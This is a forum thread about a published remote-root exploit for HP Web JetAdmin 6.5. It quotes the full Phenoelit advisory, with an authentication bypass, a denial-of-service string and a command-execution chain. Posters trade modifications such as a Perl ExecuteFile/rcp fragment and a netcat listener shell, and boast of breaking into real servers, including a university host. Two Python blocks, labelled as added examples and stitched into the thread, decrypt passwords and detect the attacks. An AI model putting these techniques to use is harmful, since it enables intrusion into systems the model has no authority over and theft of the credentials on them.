Gurou
HP Web JetAdmin 6.5 Remote Root Exploit (Linux & Windows)

http://www.k-otik.com/exploits/04272004.JetRoot.pl.php

Port 8000.
Xenos
Thanks dude, that's a nice Perl exploit to test your network... Btw, lots of people are using this thing...
BuzzDee
Hmm, doesn't work for me yet. I got to the point where it says "do you want to upload the file via FTP or TFTP", but the files never got uploaded...

edit:
OK, got the first one working. The upload via FTP or TFTP doesn't work every time; I tried about 10 times and it worked once :/

But I changed the code a bit and now it works really well.
mortello
Is it me or does the code have an error? I really don't know anything about Perl, so touching the code didn't do much... all I know is that there is one } too many, or maybe a { that is missing....

Can anyone help me?

Edit: Found the problem.... trying it now
RizL4
BuzzDee, can you please post it?
qcred11
Some extras:

QUOTE


[ Title ]
        Multiple vulnerabilities in HP Web JetAdmin

[ Affected Products ]
        Hewlett Packard (HP) 
                        Web JetAdmin 6.5 on any platform

        Partially affected:
                        Web JetAdmin 7.0 on any platform
                        Web JetAdmin <=6.2 on any platform

        HP Bug ID:      SSRT2397
        CERT VU ID:    VU#606673

[ Vendor communication ]
        10/28/02        Initial Notification, security-alert@hp.com
                        *Note-Initial notification by Phenoelit
                        includes a CC: to cert@cert.org by default

        From there on, communication went back and forth, while the major
        version went up and only a subset of the bugs was fixed.

[ Overview ]
        HP Web JetAdmin is an enterprise management system for large amounts
        of HP printers, print servers and their respective print queues. The
        service provides a web interface for administration, by default
        listening on port 8000. The web server (HP-Web-Server-3.00.1696) is a
        modular service supporting plugins and using .hts and .inc files for
        creation of active content.

        From the readme_en.txt file:
        ''HP Web JetAdmin contains support for all HP JetDirect-connected
          printers and plotters. This product allows users to manage HP
          JetDirect-connected printers within their intranet using a
          browser. In addition to this, HP Web JetAdmin has the ability
          to discover and manage any non-HP printer that implements the
          standard printer MIB (RFC 1759). If a peripheral includes an
          embedded web server, HP Web JetAdmin provides a link to the
          home page of the peripheral.''
       
        NOTE: (Historic, see initial date!)
              Despite the fact that the HP web site still advertises it as
              6.5, the Web JetAdmin you can currently download is 7.0. This
              one features an Apache core and several improvements, including
              SSL support with a vulnerable version of OpenSSL (0.9.6c).
              Password decryption and direct calls of functions are still
              possible, but some of the exploited functions are no longer
              existing.

[ Description ]
        Multiple vulnerabilities exist in the product. A short summary is
        outlined below:
        1  - Source disclosure of HTS and INC files
        2  - Real path disclosure of critical files
        3  - Critical files accessible through web server
        4  - User and Administrator password disclosure and decryption
        5  - User and Administrator password replay
        6  - Root/Administrator password disclosure
        7  - Denial of Service of the server due to input validation failure
        8  - Authentication circumvention on all functions
        9  - Direct access to methods of the server core and the plugins via
            the HTTP Protocol
        10 - Input validation failure for strings written to files
        11 - Root/Administrator compromise due to all of the above
        12 - Hidden games (easter egg) in the application

[ Vulnerability details ]
        [ 1 ]
        The web server will disclose the contents of the scripts, if a dot (.)
        is added to the end of the request URL.
        Example:
        http://server:8000/plugins/hpjwja/script/devices_list.hts.

        [ 2 ]
        Any page that is generated by the .HTS scripts will include a HTML
        comment line with the location of the file framework.ini, which holds
        several critical entries.
        Example:
        <!-- framework.ini F:\Program Files\HP Web JetAdmin\doc\plugins\framework\framework.ini -->

        [ 3 ]
        The file framework.ini is located inside the web root directory. Any
        unauthenticated user can access it. This file contains the encrypted
        (see below) passwords for all users, permissions for the respective
        users and other valuable information.
        Example:
        http://server:8000/plugins/framework/framework.ini

        [ 4 ]
        HP Web JetAdmin uses its own encryption. Passwords are encrypted on
        the client side, before being sent to the server, by a Java applet.
        The encryption is easily broken and reversible.
        An encrypted username or password is transmitted and stored in the
        ASCII representation of hexadecimal numbers. Such a ciphertext looks
        like 6a206d14000a7c2bc3cd3358153cffb5. This string has three elements:
        - 6a206d14 is the initialization vector for the algorithm
        - 000a is the length of the encrypted data (and double the length of
          the clear text)
        - 7c2bc3cd3358153cffb5 is the actual encrypted data

        Encryption and decryption are performed by initializing a random
        number generator with the IV supplied in the string and performing an
        XOR operation with the encrypted data and the upper 8 bits of the
        subsequently calculated random numbers. The following pseudo-code will
        be run:
       
        long v = IV;                                  /* 32-bit IV taken from the string */
        for (int i = 0; i < code.length; i++) {       /* code[] holds the 16-bit code units */
                v = 31413L * v + 13849L;              /* the "& -1L" in the original is a no-op on a long */
                code[i] = (char)(code[i] ^ (char)(v >> 24));
        }

        As a result, the clear text will be in code[] as two-byte
        characters.
       
        [ 5 ]
        Because of the static nature of the encryption broken in point 4, an
        attacker can use password strings sniffed off the network and use them
        in selfmade HTTP requests to the service. This is commonly referred to
        as replay attack.

        [ 6 ]
        When using services the host system provides only to administrative
        users (Administrator on Windows, root on UNIX), the web interface will
        require the user to enter the account data for this account. The
        entered username, password and (for Windows) the domain name are
        encrypted with the algorithm discussed in 4. Therefore, an attacker
        can sniff the strings off the network and decrypt the account
        information.

        [ 7 ]
        By modifying the "encrypted" string, an attacker can cause the service
        to lock up. As discussed in point 4, the second element in the string
        represents the length of the encrypted data. By replacing it with
        0xFFFF, the decryption function loops through the string until the
        index reaches -1, which never happened during tests and resulted in a
        completely frozen service.
        Example: 01010101FFFF02020202020202020202.

        [ 8 ]
        Access to the functionality of Web JetAdmin is usually done via HTTP
        POST requests. One of the variables always present is "obj". A typical
        request contains:
        obj=Framework:CheckPassword;Httpd:SetProfile(Profiles_Admin,password,$_pwd,$__framework_ini)
        By leaving out the element "Framework:CheckPassword;", HP Web JetAdmin
        will no longer validate the supplied password and immediately grant
        access to the function specified.
        Example:
        obj=Httpd:SetProfile(Profiles_Admin,password,$_pwd,$__framework_ini)

        [ 9 ]
        The "obj" variable discussed in 8 is actually used to call functions
        in the server core or any plugin. The server core and the plugins
        export functions to be used via HTTP. Therefore, an attacker can craft
        HTTP POST requests to use internal functions. Additionally, use of
        variables and grouping of function calls are possible. One can
        actually write little programs and submit them to the server for
        execution. Most of the functions deal with internal data structures
        and files of HP Web JetAdmin.
        Example: see 8

        [ 10 ]
        HP Web JetAdmin uses a file called "cache.ini" outside of the web
        root. This file will contain session settings for a specific session.
        The session is identified by a variable called __BrowserID submitted
        in every HTTP request of the session. The format of cache.ini is:
        ---SNIP--
        [1234]
        Variable=Value
        NextVariable=NextValue

        [5678]
        ...
        ---SNIP--
        where 1234 and 5678 are the browser ID values. An attacker can
        influence the Variable=Value pairs through the call interface
        described in 9. By calling
        obj=Httpd:VarCacheSet(FX,MemberOfPhenoelit)&__BrowserID=0
        the following cache entry is created:
        [0]
        FX=MemberOfPhenoelit

        It is also possible to inject multiple lines at the beginning of the
        file by including HTTP encoded linefeed characters in the __BrowserID
        variable:
        &__BrowserID=%0aTest%20123%0a
        will create the following entry:
        [
        Test 123
        ]

        [ 11 ]
        The Httpd core supports an exported function called "ExecuteFile".
        This function takes two or more parameters. The first one is the path
        where the file is located (leave blank for use of $PATH or %PATH%) and
        the second is the executable itself. Combined with the ability to
        write arbitrary content to a file in a known location (see 10,
        location known due to 2), an attacker can easily start a program of
        his choice. Since the service usually runs as root on UNIX or as
        SYSTEM on Windows, this gives full remote access to the server.
        Example: see Example section below

        [ 12 ]
        The security issues described above are not the result of a lack of
        time in the development department. This is proven by the fact that
        HP Web Jetadmin is delivered including two games.
        A text based adventure game is available on the URI:
        /plugins/hpjwja/script/special.hts?waycool=notyou
        The HTS file special2.hts features a hangman game and a list of
        developers.
        Hint: When playing the text adventure, throw the cat toy around to
        keep the bad kitty busy.
 

[ Solution ]
        None known at this time. HP Web JetAdmin 7.0 fixes some of the
        problems - namely removed the ExecuteFile function - but most of the
        issues and the games are still there.

[ end of file ]
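A worked implementation of the obfuscation described in item 4 of the advisory above, together with the length-field check that item 7 shows the server lacks. This is an added example, not code from the advisory, from Phenoelit or from HP. It follows the pseudo-code literally, which is an assumption on three points: the LCG state is a 64-bit Java long, one 16-bit key unit is XORed into each 16-bit code unit, and the code units are laid out big-endian in the hex string. The sample ciphertext quoted on the page is only parsed here; no plaintext is claimed for it.

```python
"""
Re-implementation of the HP Web JetAdmin password obfuscation described in the
Phenoelit advisory (item 4), plus the length-field validation that item 7 shows
the server does not perform. Added example; not the advisory's or HP's code.
"""
import struct

MULT = 31413          # LCG multiplier from the advisory's pseudo-code
INC = 13849           # LCG increment
MASK64 = (1 << 64) - 1


def keystream(iv: int, units: int):
    """Yield one 16-bit key unit per code unit.

    Assumption: the state is a Java long (64-bit wrap-around) and the key
    unit is (char)(v >> 24), i.e. bits 24..39 of the state.
    """
    v = iv & MASK64
    for _ in range(units):
        v = (MULT * v + INC) & MASK64
        yield (v >> 24) & 0xFFFF


def xor_units(iv: int, data: bytes) -> bytes:
    """XOR every big-endian 16-bit code unit in `data` with the keystream.
    Encryption and decryption are the same operation."""
    if len(data) % 2:
        raise ValueError("data is not a whole number of 16-bit code units")
    n = len(data) // 2
    units = struct.unpack(f">{n}H", data)
    out = [u ^ k for u, k in zip(units, keystream(iv, n))]
    return struct.pack(f">{n}H", *out)


def parse_blob(hexstr: str):
    """Split a transmitted string into (iv, data) and validate the length
    field BEFORE using it.  Trusting the field is what lets the 0xFFFF value
    from item 7 spin the server's decryption loop."""
    raw = bytes.fromhex(hexstr)
    if len(raw) < 6:
        raise ValueError("blob shorter than IV + length field")
    iv = int.from_bytes(raw[:4], "big")
    declared = int.from_bytes(raw[4:6], "big")
    data = raw[6:]
    if declared != len(data):
        raise ValueError(
            f"length field says {declared} bytes but {len(data)} are present")
    return iv, data


def decrypt(hexstr: str) -> str:
    """Recover the clear text from a sniffed/stored string."""
    iv, data = parse_blob(hexstr)
    return xor_units(iv, data).decode("utf-16-be", errors="replace")


def encrypt(text: str, iv: int) -> str:
    """Produce a string in the same IV|len|data hex layout (needed to verify
    that a replayed value really is a plain XOR of the clear text)."""
    data = xor_units(iv, text.encode("utf-16-be"))
    if len(data) > 0xFFFF:
        raise ValueError("clear text too long for the 16-bit length field")
    return f"{iv & 0xFFFFFFFF:08x}{len(data):04x}{data.hex()}"


if __name__ == "__main__":
    # The sample string from the advisory: IV 6a206d14, length 000a, 10 data bytes.
    iv, data = parse_blob("6a206d14000a7c2bc3cd3358153cffb5")
    print(f"iv={iv:08x} len={len(data)} data={data.hex()}")
    # Round trip on a constructed password using the same IV.
    ct = encrypt("admin", 0x6A206D14)
    print(ct, "->", decrypt(ct))
    # The DoS string from item 7 is rejected instead of looping.
    try:
        parse_blob("01010101FFFF02020202020202020202")
    except ValueError as e:
        print("rejected:", e)
```

Because the key unit depends only on the IV, the same clear text under the same IV always yields the same string, which is why the sniffed value can be replayed (item 5) without ever being decrypted.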
ivan288
Nice sploit. Will test and report back.
BuzzDee
QUOTE
BuzzDee, can you please post it?


I just changed it so that it fits MY needs. It won't help you. Well, I can give it to you, but I will get shells and you nothing.

What I did is that it immediately uploads files via rcp (I don't like FTP and TFTP...) and then executes nc -L -vvv -p [port]. That way you will have your shell connecting to the IP with the port you specify.

edit:

I just wonder how to secure those servers. It says no solution found yet... Is it possible to change the banner? Or does anyone have a better idea? ^^
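On the question raised in the post above, how to tell whether these servers are being hit: items 1, 3, 8, 10 and 11 of the advisory quoted earlier are all visible in the request line or the POST body, so they can be matched from a proxy or web-server log without touching the application. The rules below are an added example, not part of this thread or of the advisory; the log records are constructed, and the finding names are my own.

```python
"""
Request-inspection rules for the HP Web JetAdmin issues in the Phenoelit
advisory (items 1, 3, 8, 10 and 11).  Added example; not the advisory's,
the thread's or HP's code.  Log records below are constructed.
"""
import re
from urllib.parse import unquote_plus

# Finding name -> which advisory item it corresponds to.
FINDINGS = {
    "source-disclosure":  "item 1: trailing dot on a .hts/.inc path",
    "credential-file":    "item 3: framework.ini fetched through the web root",
    "auth-bypass":        "item 8: obj chain does not start with Framework:CheckPassword;",
    "var-cache-set":      "item 10: Httpd:VarCacheSet writes into cache.ini",
    "browserid-injection": "item 10: __BrowserID is not a plain number",
    "execute-file":       "item 11: Httpd:ExecuteFile call",
}


def parse_form(body: str) -> dict:
    """Split a form body on '&' only.  The obj value legitimately contains
    ';' as the call separator, so a parser that also splits on ';' (older
    urllib.parse.parse_qs did) would destroy the chain we need to inspect."""
    fields = {}
    for pair in body.split("&"):
        if pair:
            k, _, v = pair.partition("=")
            fields[unquote_plus(k)] = unquote_plus(v)
    return fields


def inspect_request(method: str, path: str, body: str = "") -> list:
    """Return the list of finding names for one request (empty if clean)."""
    findings = []
    route, _, query = path.partition("?")
    route = route.lower()
    if re.search(r"\.(hts|inc)\.$", route):
        findings.append("source-disclosure")
    if route.endswith("/framework.ini"):
        findings.append("credential-file")

    fields = parse_form(body if method.upper() == "POST" else query)
    obj = fields.get("obj")
    if obj is not None:
        if not obj.startswith("Framework:CheckPassword;"):
            findings.append("auth-bypass")
        if "Httpd:ExecuteFile(" in obj:
            findings.append("execute-file")
        if "Httpd:VarCacheSet(" in obj:
            findings.append("var-cache-set")
    bid = fields.get("__BrowserID")
    if bid is not None and not re.fullmatch(r"\d+", bid):
        findings.append("browserid-injection")
    return findings


# Constructed records: (method, path, body).  The first one mirrors the
# legitimate request shape given in item 8; the rest mirror the abuses.
SAMPLE_LOG = [
    ("POST", "/plugins/hpjwja/script/devices_list.hts",
     "obj=Framework:CheckPassword;Httpd:SetProfile(Profiles_Admin,password,$_pwd,$__framework_ini)&__BrowserID=1234"),
    ("POST", "/plugins/hpjwja/script/devices_list.hts",
     "obj=Httpd:SetProfile(Profiles_Admin,password,$_pwd,$__framework_ini)&__BrowserID=1234"),
    ("POST", "/plugins/hpjwja/script/devices_list.hts",
     "obj=Httpd:VarCacheSet(FX,MemberOfPhenoelit)&__BrowserID=%0aTest%20123%0a"),
    ("POST", "/plugins/hpjwja/script/devices_list.hts",
     "obj=Httpd:ExecuteFile(,calc.exe)&__BrowserID=0"),
    ("GET", "/plugins/hpjwja/script/devices_list.hts.", ""),
    ("GET", "/plugins/framework/framework.ini", ""),
]


def scan(records=SAMPLE_LOG) -> dict:
    """Map record index -> findings, for every record that has any."""
    result = {}
    for i, (method, path, body) in enumerate(records):
        hits = inspect_request(method, path, body)
        if hits:
            result[i] = hits
    return result


if __name__ == "__main__":
    for i, hits in scan().items():
        print(i, SAMPLE_LOG[i][0], SAMPLE_LOG[i][1])
        for h in hits:
            print("   ", h, "-", FINDINGS[h])
```

The first record produces no finding, which is the point of the `Framework:CheckPassword;` prefix check: a legitimate client always sends it, so its absence on a request that still carries an obj chain is the bypass from item 8 rather than noise.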
ivan288
Well, I got the files uploaded, but I think they are not executed.
I uploaded nc.exe and a .bat, and had no luck when trying to connect via nc.
Anyone know any script or other way to start nc to get a shell?
Stevy
The exploit works very well; hacked 8 servers with it, all with nice uptimes. I currently secure them by renaming tftp + ftp and then stopping the webjetadmin service.
cyrixx
Hmm, I always get this:
CODE
Phenoelit HP Web JetAdmin 6.5 remote
Linux root and Windows NT/2000 Administrator exploit
by FX of Phenoelit
Research done at BlackHat Singapore 2002

cannot connect to http daemon on ***.***.***.***

But I keep on trying.
BuzzDee
QUOTE
I currently secure them by renaming tftp + ftp and then stopping the webjetadmin service.


Renaming ftp / tftp is useless. I upload my files with rcp. I could also use other ways; you just have to change the code a bit. Please don't ask me how, it should be obvious... This method keeps away script kiddies, but not someone who uses his brain ^^

Stopping the JetAdmin service is a GREAT idea, LOL. I'm sure the admin won't notice that...

Better patch the server:

QUOTE
HP Web JetAdmin 7.0 fixes some of the
       problems - namely removed the ExecuteFile function
mortello
After checking the code and trying to fix the stuff in it.... I am unable to start anything....

I do upload a backdoor that should open a port.... but that port never opens....

I use the FTP method... the files get uploaded to the server..... could someone point me in the right direction on how to fix the execute functions....

because the way this was written doesn't seem to work at all!
Presnus
Can somebody say what the port banner looks like? It should help me, because I've got tons of results!
dtDaMan
Hi!

I edited the TFTP part in the script to RCP, but it doesn't work.

Can somebody help me?

QUOTE

print "RCP used ...\n";
print "RCP Host: "; $ftph=<STDIN>; chomp($ftph);
print "RCP File: "; $ftpfile=<STDIN>; chomp($ftpfile);

$cont=
"obj=".
"Httpd:ExecuteFile(,rcp.exe,-b,".$ftph.".get:".$ftpfile.",".$ftpfile.");".
"Httpd:ExecuteFile(".$ftpfile.")";


DaMan
studnikov
This sploit works well; it's just a matter of securing the servers now.
Presnus
QUOTE (BuzzDee @ Apr 28 2004, 07:25 AM)
QUOTE
BuzzDee, can you please post it?


I just changed it so that it fits MY needs. It won't help you. Well, I can give it to you, but I will get shells and you nothing.

What I did is that it immediately uploads files via rcp (I don't like FTP and TFTP...) and then executes nc -L -vvv -p [port]. That way you will have your shell connecting to the IP with the port you specify.

edit:

I just wonder how to secure those servers. It says no solution found yet... Is it possible to change the banner? Or does anyone have a better idea? ^^

Maybe you can share it with us.
..:Z:..
It's a really nice Perl script, but um... can someone post the RCP part please?

I get many bugs when I change it to rcp.


THX for the help, and for sharing this nice Perl script ^^ ! // edit: I've fixed it.
nebojsa
QUOTE
I currently secure them by renaming tftp + ftp and then stopping the webjetadmin service.


What kind of cheat is this? Imagine that the administrator has to use this command; are you silly or .....?
totof
Yeah, does a scanner exist for the HP Web JetAdmin 6.5 version?
Because I have a lot of HP Web JetAdmin IPs but I don't know the version.
OleaSTeR
Working fine with Windows 2000, HP Web JetAdmin Version: 6.5.1696
totof
Anyone succeeded in uploading the file to the box? I get this:
QUOTE
HP Web JetAdmin Path:
        C:\Program Files\HP Web JetAdmin\doc\plugins\framework\framework.ini
HP Web JetAdmin Version: 6.5.1696
Target system is Windows.
Do you want file upload via FTP [f] or TFTP [t]: f
FTP used ...
FTP Host: 83.*.*.*
FTP User: pass
FTP Pass: pass
FTP Path: c:\documents and settings\totof.fox\mes documents\appz_hack\new
FTP File: wollf.exe
File wollf.exe will be downloaded from 83.*.*.*c:\documents and settings\totof.fox\mes documents\appz_hack\new
with username brand and password brand
If everything works well, the specified file should be running
soon in SYSTEM context. Don't stop this script until your program
terminates. Enjoy the box.

But I cannot upload the file with the FTP or TFTP method?
totof
Finally the file is uploaded, but does it execute the file when the upload has finished?
totof
Finally it works, I got a *.edu
XeLoRy
I know this exploit, but it doesn't work for me so far.
"It's not version 6.5 or version extraction failed"
I always get this message, on more than 50 boxes on different IP ranges.

Anyone up for compiling an autohaxor? I've got too many results to do that one by one...
subcorner
This exploit was really good, but too many people are looking for it.
Anyway, securing that is not hard, btw.
Use your brain.
If you cannot protect it, you can stop it, lol.
I'm not the only one finding all the unprotected servers.
Killaloop
QUOTE (subcorner @ Jun 9 2004, 10:37 PM)
This exploit was really good, but too many people are looking for it.
Anyway, securing that is not hard, btw.
Use your brain.
If you cannot protect it, you can stop it, lol.
I'm not the only one finding all the unprotected servers.

You cannot secure Web JetAdmin without installing the new version.
Or do you think deleting about.hts secures the hole?
No, it does not.
My exploit used other files to get the information it needs.
Better install the new version.
winsoc
Hello,
after using the sploit against Linux boxes,
when you get the Linux boxes open, with web browsing to xxx.xxx.xxx.xxx:3000
you just see ntop. How do I get a bash from this, or how can I install glftpd from there?
Am I not seeing the light at the end of the tunnel?
winsoc
um....
PUSH
Invision Power Board © 2001-2005 Invision Power Services, Inc.